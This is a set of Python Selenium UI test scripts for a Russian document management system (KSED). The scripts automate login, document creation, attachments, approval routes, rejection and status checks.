class KSEDPDPodpisanie_Otklon(Locator, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=''):
super().__init__(web_driver, uri)
self.get(dataTest.baseURL)
wait_page_loaded(self.w)
@allure.step("Авторизация")
def LogIN(self, username, password):
# wait = WebDriverWait(self.w, 10, poll_frequency=1,
# ignored_exceptions=[NoSuchElementException,
# ElementNotVisibleException,
# ElementNotSelectableException])
page = Locator(self.w)
page.username_text = username
print(Locator.username_text)
page.password_text = password
page.LogIn_button.click()
wait_page_loaded(self.w)
# assert "АРМ" in self.w.title
# Открытие документа из прошлого ТК
def getDoc(self):
my_file = open("Tests/linkPD.txt", "r")
my_string = my_file.read()
my_string.strip()
self.w.get(my_string)
my_file.close()
#self.w.get(KSEDLocators.LinkDocRD)
wait_page_loaded(self.w)
def Podpisanie_Otklon(self, ):
page = Locator(self.w)
wait = WebDriverWait(self.w, 10)
WebDriverWait(self.w, 10).until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.REJECTED_button)))
page.REJECTED_button.click()
page.prop_bpm_comment.send_keys('я так хотю')
page.apply_button_button.click()
wait_page_loaded(self.w)
# Проверим статус документа
WebDriverWait(self.w, 10).until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.osnSvedeniya)))
page.osnSvedeniya.click()
assert "На доработке" in self.status_Doc.text
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDStatAllureVidDic(MPages, Locator, dataTest,KSEDLocators):
def __init__(self, web_driver, uri = dataTest.baseURL):
super().__init__(web_driver, uri)
# self.get(dataTest.baseURL)
# wait_page_loaded(self.w)
@allure.step("Авторизация")
def LogIN(self, username, password):
self.username_text = username
self.password_text = password
self.LogIn_button.click()
self.wait_page_loaded()
#wait_page_loaded(self._web_driver)
assert "АРМ" in self._web_driver.title
# Ожидание
# select = Select(Locator.username_text)
# select.select_by_visible_text("текст")
# self.wait_page_loaded()
#
# assert "АРМ" in self._web_driver.title
# actions = ActionChains(self.w)
self.section_allur.move_to_element() # Перейти в строку отчеты
self.section_allur.click()
self.stat_tipDoc.wait_until_not_visible()
self.node_Statis.click() # Перейти статистические отчеты
self.stat_tipDoc.wait_until_not_visible()
self.stat_tipDoc.click() # Переход в сводку по типам документов
self.confirm_4.wait_to_be_clickable()
self.confirm_4.click() # Перейти отчеты с истекшим сроком
assert len(self._web_driver.window_handles) == 2 # Проверка, что открытось 2 окно
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDallurResolution(Locator, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=''):
super().__init__(web_driver, uri)
self.get(dataTest.baseURL)
wait_page_loaded(self.w)
def LogIN(self, username, password):
# wait = WebDriverWait(self.w, 10, poll_frequency=1,
# ignored_exceptions=[NoSuchElementException,
# ElementNotVisibleException,
# ElementNotSelectableException])
page = Locator(self.w)
page.username_text = username
print(Locator.username_text)
page.password_text = password
page.LogIn_button.click()
page2 = MPages(self.w, self.w.current_url)
wait_page_loaded(self.w)
assert "АРМ" in self.w.title
#time.sleep(0.5)
actions = ActionChains(self.w)
actions.move_to_element(page.section_allur).click().perform() # Перейти в строку отчеты
time.sleep(0.5) # без этого ожидания не работает
WebDriverWait(self.w, 5).until(EC.visibility_of_element_located((By.XPATH, KSEDLocators.node_ispDisp)))
page.node_ispDisp.click() # Перейти отчеты по исп дисциплине
page2.melements.click()
# time.sleep(1)
page2.wait_page_loaded()
page2.m2elements.click()
# page.allu_SostIspR.click() # Перейти в раздел состояние исполнеия резолюций
# time.sleep(2)
WebDriverWait(self.w, 5).until(EC.visibility_of_element_located((By.XPATH, KSEDLocators.confirm_3)))
page.confirm_3.click() # Кнопка ОК
time.sleep(0.5)
assert len(self.w.window_handles) == 2 # Проверка, что открытось 2 окно
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDPrintAttach(Locator, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=''):
super().__init__(web_driver, uri)
self.get(dataTest.baseURL)
wait_page_loaded(self.w)
@allure.step("Авторизация")
def LogIN(self, username, password):
# wait = WebDriverWait(self.w, 10, poll_frequency=1,
# ignored_exceptions=[NoSuchElementException,
# ElementNotVisibleException,
# ElementNotSelectableException])
page = Locator(self.w)
page.username_text = username
print(Locator.username_text)
page.password_text = password
page.LogIn_button.click()
wait_page_loaded(self.w)
assert "АРМ" in self.w.title
# Открытие документа из прошлого ТК
def getDoc(self):
my_file = open("Tests/linkDocSZ.txt", "r")
my_string = my_file.read()
my_string.strip()
self.w.get(my_string)
my_file.close()
#self.w.get(KSEDLocators.LinkDoc)
wait_page_loaded(self.w)
def printAttach(self):
wait = WebDriverWait(self.w, 2, poll_frequency=1,
ignored_exceptions=[NoSuchElementException,
ElementNotVisibleException,
ElementNotSelectableException])
page = Locator(self.w)
#time.sleep(3)
page.btnPrint.click()
#time.sleep(1)
# w = len(self.w.switch_to_alert())#window_handles)
# print(w)
time.sleep(2)
# assert (w == 2)
#assert self.w.switch_to_alert() is True
#WebDriverWait(self.w, 3).until(EC.alert_is_present())
#time.sleep(10)
#assert wait.until(EC.invisibility_of_element_located((By.XPATH, KSEDLocators.btnPrint)))
# alert = self.w.switch_to_alert()
# alert.accept()
# print(alert.text)
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from selenium.webdriver import ActionChains
from selenium.webdriver.common.keys import Keys
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDCreatDocPorNIspoln(MPages, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=dataTest.baseURL):
super().__init__(web_driver, uri)
@allure.step("Авторизация")
def LogIN(self, username, password):
self.username_text = username
self.password_text = password
self.LogIn_button.click()
self.wait_page_loaded()
#wait_page_loaded(self._web_driver)
assert "АРМ" in self._web_driver.title
# Создание документа (открытие формы создания и заполнение атрибутов)
def Creat(self,):
self.newDoc_button.wait_to_be_clickable()
self.newDoc_button.click()
self.poruchenie.wait_to_be_clickable()
self.poruchenie.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
self.wait_page_loaded()
assert "Страница создания документа" in self.w.title
# Атрибуты документа
# Тип поручения
self.tipPoruch.scroll_to_element()
self.tipPoruch.wait_until_not_visible()
self.tipPoruch.send_keys(u'Для информации' + Keys.ENTER)
# Категория документа
self.category_doc.wait_until_not_visible()
self.category_doc.send_keys(u'Открытый' + Keys.RETURN)
# Ответственный исполнитель
self.otvetstv_ispoln.scroll_to_element()
self.otvetstv_ispoln.wait_until_not_visible()
self.otvetstv_ispoln.send_keys(u'Строганов' + Keys.RETURN)
# Кнопка "Создать"
self.btnCreateDoc.scroll_to_element()
self.btnCreateDoc.wait_to_be_clickable()
self.btnCreateDoc.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
self.wait_page_loaded()
assert "Документ" in self.w.title
# Добавление вложения
def attachment(self, ):
actions = ActionChains(self._web_driver)
actions.move_to_element(self.vlozheniya).perform()
self.attachments.wait_to_be_clickable()
self.attachments.click()
self.fileUpload2.wait_to_be_clickable()
self.fileUpload2.click()
self.files.wait_to_be_clickable()
self.files.send_keys('C:\\test.txt')
# Создание маршрута согласования
def creation_of_the_approval_route(self):
# "Показать общую карточку" клик
self.show.wait_until_not_visible()
self.show.wait_to_be_clickable()
self.show.click()
# "Согласование" вкладка
self.soglasovanieWkladka.wait_to_be_clickable()
self.soglasovanieWkladka.click()
# "Создать маршрут" клик по кнопке
self.createRuleBtn.wait_to_be_clickable()
self.createRuleBtn.click()
# Выберем "Индивидуальный маршрут"
self.createRuleIndivid.wait_to_be_clickable()
self.createRuleIndivid.click()
# Появилась форма "Редактирование маршрута" нажмем "ОК"
self.btnOKform.wait_to_be_clickable()
self.btnOKform.click()
# Нажмем кнопку "Добавить этап"
self.addEtap.wait_to_be_clickable()
self.addEtap.click()
# Заполним "Вид этапа"
self.tipeEtap.wait_until_not_visible()
self.tipeEtap.send_keys("Согласование" + Keys.RETURN)
# Заполним "Согласующие"
self.soglasuychie.wait_until_not_visible()
self.soglasuychie.send_keys("Яцкин" + Keys.RETURN)
# Нажмем кнопку "ОК" на форме
self.btnOKformSogl.wait_to_be_clickable()
self.btnOKformSogl.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
self.wait_page_loaded()
# Направление на исполнение
def NapIspolnenie(self, ):
self.sendFor_execution.wait_to_be_clickable()
self.sendFor_execution.click()
self.btnOKnaprNaIspoln.wait_to_be_clickable()
self.btnOKnaprNaIspoln.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
self.wait_page_loaded()
# Проверим статус документа
self.osnSvedeniya.wait_to_be_clickable()
self.osnSvedeniya.click()
self.status_Doc.wait_until_not_visible()
assert "На исполнении" in self.status_Doc.text
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from selenium.webdriver.common.keys import Keys
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDDocPorSendAllure(MPages, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=dataTest.baseURL):
super().__init__(web_driver, uri)
@allure.step("Авторизация")
def LogIN(self, username, password):
self.username_text = username
self.password_text = password
self.LogIn_button.click()
self.wait_page_loaded()
#wait_page_loaded(self._web_driver)
assert "АРМ" in self._web_driver.title or "Документ" in self._web_driver.title
# Открытие документа из прошлого ТК
def getDoc(self):
my_file = open("Tests/linkDocPoruchenie.txt", "r")
my_string = my_file.read()
my_string.strip()
self._web_driver.get(my_string)
my_file.close()
self.wait_page_loaded()
# Отправка отчета
def sendAllure(self, ):
# Кликнем по действию "Отправить отчет" в функциональном меню "Действия"
self.actionSendAllere.wait_to_be_clickable()
self.actionSendAllere.click()
# Заполним поле "Текст отчета"
self.textAllur.wait_to_be_clickable()
self.textAllur.click()
# Добавим связь с документом
self.btnAddSvyz.click()
self.searchDoc.send_keys("У" + Keys.RETURN)
self.oneListEl.wait_until_not_visible()
self.oneListEl.click()
self.btnOK.click()
# Нажмем кнопку "Отправить"
self.btnSend.wait_to_be_clickable()
self.btnSend.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
self.wait_page_loaded()
# Проверим статус документа
self.osnSvedeniya.wait_to_be_clickable()
self.osnSvedeniya.click()
self.status_Doc.wait_until_not_visible()
assert "Исполнено" in self.status_Doc.text
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDCreatDocPDSoglas(Locator, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=''):
super().__init__(web_driver, uri)
self.get(dataTest.baseURL)
wait_page_loaded(self.w)
@allure.step("Авторизация")
def LogIN(self, username, password):
# wait = WebDriverWait(self.w, 10, poll_frequency=1,
# ignored_exceptions=[NoSuchElementException,
# ElementNotVisibleException,
# ElementNotSelectableException])
page = Locator(self.w)
page.username_text = username
print(Locator.username_text)
page.password_text = password
page.LogIn_button.click()
wait_page_loaded(self.w)
assert "АРМ" in self.w.title
# Открытие документа из прошлого ТК
def getDoc(self):
my_file = open("Tests/linkPD.txt", "r")
my_string = my_file.read()
my_string.strip()
self.w.get(my_string)
my_file.close()
#self.w.get(KSEDLocators.LinkDocRD)
wait_page_loaded(self.w)
# Создание документа (открытие формы создания и заполнение атрибутов)
def Creat(self, ):
# wait = WebDriverWait(self.w, 10, poll_frequency=1,
# ignored_exceptions=[NoSuchElementException,
# ElementNotVisibleException,
# ElementNotSelectableException])
page = Locator(self.w)
wait = WebDriverWait(self.w, 10)
page.newDoc_button.click()
page.proizvDoc.click()
assert "Страница создания документа" in self.w.title
# time.sleep(1)
# Атрибуты документа
# Заголовок
page.title.send_keys(u'Документ')
time.sleep(0.5)
# Вид документа
page.doc_typeInp.send_keys(u'Договор' + Keys.RETURN)
time.sleep(0.5)
# Проработка
self.w.execute_script("arguments[0].scrollIntoView();", page.prorabotka)
page.prorabotka.send_keys(u'Строганов' + Keys.RETURN)
time.sleep(0.5)
# Нормоконтроль
self.w.execute_script("arguments[0].scrollIntoView();", page.normokontrol)
page.normokontrol.send_keys(u'Строганов' + Keys.RETURN)
# Согласование
self.w.execute_script("arguments[0].scrollIntoView();", page.soglasovanie)
page.soglasovanie.send_keys(u'Строганов' + Keys.RETURN)
# Подписание
self.w.execute_script("arguments[0].scrollIntoView();", page.podpisanie)
page.podpisanie.send_keys(u'Главный' + Keys.RETURN)
# Утверждение
self.w.execute_script("arguments[0].scrollIntoView();", page.utverzhdenie)
page.utverzhdenie.send_keys(u'Главный' + Keys.RETURN)
# Ознакомление
self.w.execute_script("arguments[0].scrollIntoView();", page.oznakomlenie)
page.oznakomlenie.send_keys(u'Строганов' + Keys.RETURN)
time.sleep(0.5)
# Кнопка "Создать"
self.w.execute_script("arguments[0].scrollIntoView();", page.btnCreateDoc)
wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.btnCreateDoc)))
page.btnCreateDoc.click()
# wait.until(EC.number_of_windows_to_be(2))
wait_page_loaded(self.w)
# self.w.set_page_load_timeout(30)
# time.sleep(2)
#
# wait.until(EC.title_is(self.w.title))
assert "Документ" in self.w.title
# Добавление вложения
def attachment(self,):
page = Locator(self.w)
wait = WebDriverWait(self.w, 10)
actions = ActionChains(self.w)
actions.move_to_element(page.vlozheniya).perform()
time.sleep(0.5)
page.attachments.click()
time.sleep(0.5)
# wait.until(EC.element_to_be_clickable((By.XPATH, '//div[contains(@id, "default-dialog")]')))
wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.fileUpload)))
page.fileUpload.click()
time.sleep(0.5)
wait.until(EC.presence_of_element_located((By.XPATH, KSEDLocators.files)))
# wait.until(EC.element_to_be_clickable((By.XPATH, '//div[contains(@id, "default-dialog")]')))
page.files.send_keys('C:\\test.txt')
# Направление на согласование и проверка статуса документа
def NapSoglasovanie(self, ):
page = Locator(self.w)
wait = WebDriverWait(self.w, 10)
time.sleep(1)
page.sendFor_approval.click()
time.sleep(1)
page.confirm.click()
wait_page_loaded(self.w)
time.sleep(1)
# Проверим статус документа
wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.osnSvedeniya)))
page.osnSvedeniya.click()
assert "На согласовании" in self.status_Doc.text
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDCreatDocPorNSoglas(MPages, Locator, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=dataTest.baseURL):
super().__init__(web_driver, uri)
@allure.step("Авторизация")
def LogIN(self, username, password):
self.username_text = username
self.password_text = password
self.LogIn_button.click()
self.wait_page_loaded()
#wait_page_loaded(self._web_driver)
assert "АРМ" in self._web_driver.title
# Открытие документа из прошлого ТК
def getDoc(self):
my_file = open("Tests/linkDocPoruchenie.txt", "r")
my_string = my_file.read()
my_string.strip()
self._web_driver.get(my_string)
my_file.close()
self.wait_page_loaded()
# Добавление вложения
def attachment(self,):
# page = Locator(self.w)
#
# actions = ActionChains(self.w)
# actions.move_to_element(page.vlozheniya).perform()
# time.sleep(0.5)
# page.attachments.click()
# actions = ActionChains(self.w)
# self.vlozheniya.wait_until_not_visible()
# actions.move_to_element(self.vlozheniya).perform()
self.vlozheniya.move_to_element()
self.attachments.wait_to_be_clickable()
self.attachments.click()
self.fileUpload2.wait_to_be_clickable()
self.fileUpload2.click()
# self.fileUpload3.wait_to_be_clickable()
# self.fileUpload3.click()
self.files.wait_to_be_clickable()
self.files.send_keys('D:\\test.txt')
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
# Создание маршрута согласования
def creation_of_the_approval_route(self):
# time.sleep(1)
# "Показать общую карточку" клик
self.show.wait_to_be_clickable()
self.show.click()
# "Согласование" вкладка
self.soglasovanieWkladka.wait_to_be_clickable()
self.soglasovanieWkladka.click()
# "Создать маршрут" клик по кнопке
self.createRuleBtn.wait_to_be_clickable()
self.createRuleBtn.click()
# Выберем "Индивидуальный маршрут"
self.createRuleIndivid.wait_to_be_clickable()
self.createRuleIndivid.click()
# Появилась форма "Редактирование маршрута" нажмем "ОК"
self.btnOKform.wait_to_be_clickable()
self.btnOKform.click()
# Нажмем кнопку "Добавить этап"
self.addEtap.wait_to_be_clickable()
self.addEtap.click()
# Заполним "Вид этапа"
# self.tipeEtap.wait_until_not_visible()
# self.tipeEtap.send_keys("Согласование" + Keys.RETURN)
# self.tipeEtap.send_keys(Keys.RETURN)
self.btnTree.wait_to_be_clickable()
self.btnTree.click() # нажать на кнопку ...
self.btnSelection3.wait_to_be_clickable()
self.btnSelection3.click() # кнопка + третий выбор
self.confirm_5.wait_to_be_clickable()
self.confirm_5.click() # кнопка + третий выбор
# Заполним "Согласующие"
self.soglasuychie.wait_until_not_visible()
self.soglasuychie.send_keys("Яцкин" + Keys.RETURN)
#time.sleep(3)
# Нажмем кнопку "ОК" на форме
#time.sleep(1)
self.btnOKformSogl.scroll_to_element()
self.btnOKformSogl.wait_to_be_clickable()
self.btnOKformSogl.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
#self.wait_page_loaded()
# Направление на согласование и проверка статуса документа
def NapSoglasovanie(self):
self.sendFor_approval.wait_to_be_clickable()
self.sendFor_approval.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
#self.wait_page_loaded()
time.sleep(4)
# Проверим статус документа
self.osnSvedeniya.wait_to_be_clickable()
self.osnSvedeniya.click()
assert "На согласовании" in self.status_Doc.get_text()
def USER_LOGOUTs(self, ):
# page = Locator(self.w)
# wait = WebDriverWait(self.w, 10)
self.user_menu.click()
self.USER_LOGOUT.click()
wait_page_loaded(self._web_driver)
assert "Войти" in self._web_driver.title
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.keys import Keys
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDCreatWaySogl(MPages, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=dataTest.baseURL):
super().__init__(web_driver, uri)
@allure.step("Авторизация")
def LogIN(self, username, password):
self.username_text = username
self.password_text = password
self.LogIn_button.click()
self.wait_page_loaded()
assert "АРМ" in self._web_driver.title
@allure.step("Создание документа")
def Creat(self,):
wait = WebDriverWait(self._web_driver, 10)
self.newDoc_button.click()
self.cardSogl.click()
self.wait_page_loaded()
assert "Страница создания документа" in self._web_driver.title
# Атрибуты документа
self.wait_page_loaded()
# Куратор
self.kurator.wait_until_not_visible()
self.kurator.scroll_to_element()
self.kurator.send_keys(u'Яцкин' + Keys.ENTER)
# Вид документа
self.viewSelecton.wait_until_not_visible()
self.viewSelecton.wait_to_be_clickable()
self.viewSelecton.click()
#Выбор Прочее
self.etcSelecton.wait_until_not_visible()
self.etcSelecton.wait_to_be_clickable()
self.etcSelecton.click()
# Выбор раздела из Прочие
self.btnSelection3.wait_to_be_clickable()
self.btnSelection3.click()
# кнопка подтвердить
self.confirm_6.wait_to_be_clickable()
self.confirm_6.click()
# заголовок
dt = datetime.datetime.today().strftime("%m-%d-%H.%M.%S")
self.titleCS.scroll_to_element()
self.titleCS.send_keys(u'Auto Прочие 15745 ' + dt)
# кнопка сохранить проект
self.saveProject.wait_to_be_clickable()
self.saveProject.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
self.wait_page_loaded()
assert "Документ" in self._web_driver.title
#открытие документа
def getDoc(self):
my_file = open("Tests/linkDocCS.txt", "r")
my_string = my_file.read()
my_string.strip()
self._web_driver.get(my_string)
my_file.close()
@allure.step("Создание не типового маршрута согласования")
def creation_of_the_approval_route(self):
# "Согласование" вкладка
self.soglasovanieWkladka.wait_to_be_clickable()
self.soglasovanieWkladka.click()
# "Создать маршрут" клик по кнопке
self.createRuleBtn.wait_to_be_clickable()
self.createRuleBtn.click()
# Выберем "Индивидуальный маршрут"
self.createRuleIndivid.wait_to_be_clickable()
self.createRuleIndivid.click()
# Появилась форма "Редактирование маршрута" нажмем "ОК"
self.btnOKform.wait_to_be_clickable()
self.btnOKform.click()
# Нажмем кнопку "Добавить этап"
self.addEtap.wait_to_be_clickable()
self.addEtap.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
# Заполним "Вид этапа"
self.btnTree.wait_to_be_clickable()
self.btnTree.click() # нажать на кнопку ...
self.wait_page_loaded()
self.btnSelection_1.wait_to_be_clickable()
self.btnSelection_1.click() # кнопка + третий выбор
self.confirm_5.wait_to_be_clickable()
self.confirm_5.click() # кнопка + третий выбор
# Заполним "Согласующие"
self.soglasuychie.wait_to_be_clickable()
self.soglasuychie.send_keys("Яцкин" + Keys.RETURN)
# Нажмем кнопку "ОК" на форме
self.btnOKformSogl.scroll_to_element()
self.btnOKformSogl.wait_to_be_clickable()
self.btnOKformSogl.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
# выпадающий список согласований
self.dropBtn_2.scroll_to_element()
self.dropBtn_2.wait_to_be_clickable()
self.dropBtn_2.click()
self.status_Doc.wait_until_not_visible()
assert "Не начато" in self.resultSogl.get_text()
# Сохраним ссылку на документ в файл
def LinkDocWFile(self):
url = self._web_driver.current_url
my_file = open("Tests/linkDocCS.txt", "w")
my_file.write(str(url))
my_file.close()
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.keys import Keys
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class KSEDsoftDecision_RD(MPages, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=dataTest.baseURL):
super().__init__(web_driver, uri)
@allure.step("Авторизация")
def LogIN(self, username, password):
self.username_text = username
self.password_text = password
self.LogIn_button.click()
self.wait_page_loaded()
assert "АРМ" in self._web_driver.title
@allure.step("Создание документа")
def Creat(self,):
wait = WebDriverWait(self._web_driver, 10)
self.newDoc_button.click()
self.cardSogl.click()
self.wait_page_loaded()
assert "Страница создания документа" in self._web_driver.title
# Атрибуты документа
self.wait_page_loaded()
# Куратор
self.kurator.wait_until_not_visible()
self.kurator.scroll_to_element()
self.kurator.send_keys(u'Яцкин' + Keys.ENTER)
# Вид документа
self.viewSelecton.wait_until_not_visible()
self.viewSelecton.wait_to_be_clickable()
self.viewSelecton.click()
# Выбор РД
self.viewSelecton.wait_until_not_visible()
self.rdSelecton.wait_to_be_clickable()
self.rdSelecton.click()
# Выбор раздела из РД
self.btnSelection4.wait_to_be_clickable()
self.btnSelection4.click()
# кнопка подтвердить
self.confirm_6.wait_to_be_clickable()
self.confirm_6.click()
# Подписант
self.podpisanti.wait_until_not_visible()
self.podpisanti.scroll_to_element()
self.podpisanti.send_keys(u'Иванов2' + Keys.ENTER)
# заголовок
dt = datetime.datetime.today().strftime("%m-%d-%H.%M.%S")
self.titleCS.scroll_to_element()
self.titleCS.send_keys(u'Auto РД 15812 ' + dt)
# кнопка сохранить проект
self.saveProject.wait_to_be_clickable()
self.saveProject.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
self.wait_page_loaded()
assert "Документ" in self._web_driver.title
def USER_LOGOUTs(self, ):
# page = Locator(self.w)
# wait = WebDriverWait(self.w, 10)
self.user_menu.click()
self.USER_LOGOUT.click()
wait_page_loaded(self._web_driver)
assert "Войти" in self._web_driver.title
#открытие документа
def getDoc(self):
my_file = open("Tests/linkDocCS.txt", "r")
my_string = my_file.read()
my_string.strip()
self._web_driver.get(my_string)
my_file.close()
@allure.step("Создание маршрута согласования")
def creation_of_the_approval_route(self):
# "Согласование" вкладка
self.soglasovanieWkladka.wait_to_be_clickable()
self.soglasovanieWkladka.click()
# "Создать маршрут" клик по кнопке
self.createRuleBtn.wait_to_be_clickable()
self.createRuleBtn.click()
# Выберем "Типовой маршрут"
self.createRuleTypical.wait_to_be_clickable()
self.createRuleTypical.click()
# Кнопка "Продолжить"
self.btnContinium.wait_to_be_clickable()
self.btnContinium.click()
self.btnSelection_3.wait_to_be_clickable()
self.btnSelection_3.click() # кнопка + третий выбор
self.confirm_5.wait_to_be_clickable()
self.confirm_5.click() # кнопка подтвердить
self.wait_page_loaded()
# выпадающий список согласований
self.dropBtn_2.scroll_to_element()
self.dropBtn_2.wait_to_be_clickable()
self.dropBtn_2.click()
# Добавление сотрудника
self.btnAddPerson.wait_to_be_clickable()
self.btnAddPerson.click()
self.wait_page_loaded()
self.reserchInput.send_keys(u'Яцкин' + Keys.ENTER)
self.btnSelection1.wait_to_be_clickable()
self.btnSelection1.click() # кнопка + третий выбор
self.confirm_5.wait_to_be_clickable()
self.confirm_5.click() # кнопка подтвердить
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
# # выпадающий список согласований
# self.dropBtn_2.wait_to_be_clickable()
# self.dropBtn_2.scroll_to_element()
# self.dropBtn_2.click()
self.resultSogl.wait_to_be_clickable()
assert "Не начато" in self.resultSogl.get_text()
# Сохраним ссылку на документ в файл
def LinkDocWFile(self):
url = self._web_driver.current_url
my_file = open("Tests/linkDocCS.txt", "w")
my_file.write(str(url))
my_file.close()
@allure.step("Загрузка вложения")
def attachment(self, ):
time.sleep(2)
self.vlozheniya.move_to_element()
self.attachments.wait_to_be_clickable()
self.attachments.click()
self.fileUpload.wait_to_be_clickable()
self.fileUpload.click()
self.files.wait_to_be_clickable()
self.files.send_keys('D:\\test.txt')
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
@allure.step("Направление на согласование")
def NapSoglasovanie(self):
self.sendFor_approval.wait_to_be_clickable()
self.sendFor_approval.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
# Проверим статус документа
self.osnSvedeniya.wait_to_be_clickable()
self.osnSvedeniya.scroll_to_element()
self.osnSvedeniya.click()
assert "На согласовании" in self.status_Doc_1.get_text()
@allure.step("Отклонение документа")
def rejectDoc(self):
time.sleep(10)
self.get(self._web_driver.current_url)
self.REJECTED_button.wait_to_be_clickable()
self.REJECTED_button.click()
self.wait_page_loaded()
self.prop_bpm_comment.wait_to_be_clickable()
self.prop_bpm_comment.send_keys('Доработать')
self.apply_button_button.wait_to_be_clickable()
self.apply_button_button.click()
self.wait_page_loaded()
assert "Отклонено" in self.statusSogl.get_text()
